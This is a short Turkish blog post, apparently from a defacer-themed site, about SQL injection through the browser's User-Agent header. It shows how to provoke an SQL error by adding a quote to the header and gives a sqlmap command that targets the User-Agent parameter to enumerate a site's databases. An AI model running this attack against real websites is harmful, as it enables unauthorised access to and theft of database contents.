USER-AGENT İLE SQL INJECTİON
Kullandığımız internet tarayıcılarının tümü içerisinde bir User Agent, yani kod dizgisi/string barındırır. Bu kod dizgisi yardımıyla bağlanmaya çalıştığımız web sunucusu tıpkı IP adresimizde olduğu gibi bizim hangi tarayıcıyı ve hangi işletim sistemini kullandığımızı öğrenir. User Agent’lar genellikle web sitesi sahipleri tarafından bir sitenin iyileştirme çalışmaları için kullanılabilir.
tamper data ile request verilerini görüyoruz
User-Agent sonuna ‘ atarak sql hatası varmı ona bakcaz
ve sql hatası aldık şimdi sqlmap ile bir saldırı yapcaz
sqlmap.py -u https://scorpioldefacer.blogspot.com/sql.php –cookie=”xxx” –user-agent”xxxx” -p “user-agent” –dbs
Yorum Gönder